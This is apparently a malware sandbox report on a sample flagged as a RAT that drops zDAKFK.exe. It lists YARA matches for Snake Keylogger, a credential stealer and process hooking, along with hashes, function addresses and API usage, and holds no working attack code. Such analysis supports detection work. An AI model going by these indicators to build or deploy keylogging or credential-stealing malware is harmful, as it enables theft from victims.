                Source: 12.2.zDAKFK.exe.40f44c8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 12.2.zDAKFK.exe.40f44c8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 12.2.zDAKFK.exe.40f44c8.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 12.2.zDAKFK.exe.40f44c8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 12.2.zDAKFK.exe.40f44c8.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 12.2.zDAKFK.exe.40b12a8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 12.2.zDAKFK.exe.40b12a8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 12.2.zDAKFK.exe.40b12a8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe PID: 6992, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe PID: 7176, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: zDAKFK.exe PID: 7248, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeCode function: 0_2_017842BC0_2_017842BC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeCode function: 0_2_0178E1AC0_2_0178E1AC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeCode function: 0_2_017875E30_2_017875E3
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeCode function: 0_2_057702280_2_05770228
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeCode function: 0_2_057702180_2_05770218
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeCode function: 0_2_0577ED800_2_0577ED80
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeCode function: 0_2_07B513100_2_07B51310
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeCode function: 0_2_07B541000_2_07B54100
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeCode function: 0_2_07B500400_2_07B50040
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeCode function: 0_2_07B536C00_2_07B536C0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeCode function: 0_2_07B543900_2_07B54390
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeCode function: 0_2_07B5438A0_2_07B5438A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeCode function: 0_2_07B5B3C00_2_07B5B3C0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeCode function: 0_2_07B513000_2_07B51300
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeCode function: 0_2_07B540F00_2_07B540F0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeCode function: 0_2_07B5003A0_2_07B5003A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeCode function: 0_2_07B5AF880_2_07B5AF88
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeCode function: 0_2_07B57F680_2_07B57F68
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeCode function: 0_2_07B5CD580_2_07B5CD58
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeCode function: 0_2_07B5AB500_2_07B5AB50
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeCode function: 0_2_07B5C9200_2_07B5C920
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeCode function: 0_2_093B78E80_2_093B78E8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeCode function: 0_2_093B81600_2_093B8160
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeCode function: 0_2_0F0323A80_2_0F0323A8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeCode function: 11_2_02AC3E0911_2_02AC3E09
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeCode function: 11_2_02AC3A9111_2_02AC3A91
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeCode function: 11_2_02AC29EC11_2_02AC29EC
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 12_2_009C42BC12_2_009C42BC
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 12_2_009CE1AC12_2_009CE1AC
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 12_2_009C42B012_2_009C42B0
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 12_2_009C75E212_2_009C75E2
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 12_2_050936C012_2_050936C0
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 12_2_0509410012_2_05094100
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 12_2_0509003B12_2_0509003B
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 12_2_0509004012_2_05090040
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 12_2_050940F012_2_050940F0
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 12_2_0509130012_2_05091300
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 12_2_0509131012_2_05091310
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 12_2_0509438112_2_05094381
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 12_2_0509439012_2_05094390
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 12_2_0509B3C012_2_0509B3C0
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 12_2_0509CD5812_2_0509CD58
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 12_2_05097F7712_2_05097F77
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 12_2_0509AF8812_2_0509AF88
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 12_2_0509C92012_2_0509C920
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 12_2_0509AB5012_2_0509AB50
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 12_2_0E2616A012_2_0E2616A0
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 16_2_00D9A08816_2_00D9A088
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 16_2_00D9C14716_2_00D9C147
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 16_2_00D9D2C816_2_00D9D2C8
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 16_2_00D9536216_2_00D95362
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 16_2_00D9D59916_2_00D9D599
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 16_2_00D9C78816_2_00D9C788
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 16_2_00D969A016_2_00D969A0
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 16_2_00D9EAA816_2_00D9EAA8
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 16_2_00D9CA5816_2_00D9CA58
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 16_2_00D9FBE616_2_00D9FBE6
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 16_2_00D9CD2816_2_00D9CD28
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 16_2_00D93E0916_2_00D93E09
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 16_2_00D96FC816_2_00D96FC8
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 16_2_00D9CFF716_2_00D9CFF7
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 16_2_00D939ED16_2_00D939ED
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 16_2_00D929EC16_2_00D929EC
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 16_2_00D9EA9B16_2_00D9EA9B
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 16_2_00D93AA116_2_00D93AA1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7176 -s 1520
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000000.1670060735.0000000000E32000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePHCUmkeAjDPT.exe0 vs SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1725042592.0000000003532000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1727563021.0000000004B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1723863985.00000000014AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1734225665.000000000B9A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeBinary or memory string: OriginalFilenamePHCUmkeAjDPT.exe0 vs SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 11.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 12.2.zDAKFK.exe.40b12a8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 11.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 12.2.zDAKFK.exe.40b12a8.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 12.2.zDAKFK.exe.40b12a8.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 11.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 12.2.zDAKFK.exe.40f44c8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 12.2.zDAKFK.exe.40f44c8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 12.2.zDAKFK.exe.40f44c8.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 12.2.zDAKFK.exe.40f44c8.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 12.2.zDAKFK.exe.40f44c8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 12.2.zDAKFK.exe.40f44c8.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 12.2.zDAKFK.exe.40b12a8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 12.2.zDAKFK.exe.40b12a8.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 12.2.zDAKFK.exe.40b12a8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe PID: 6992, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe PID: 7176, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: zDAKFK.exe PID: 7248, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: zDAKFK.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 12.2.zDAKFK.exe.40f44c8.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 12.2.zDAKFK.exe.40f44c8.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 12.2.zDAKFK.exe.40f44c8.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, DcHUM92j2w5Tv1Pf7E.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, DcHUM92j2w5Tv1Pf7E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
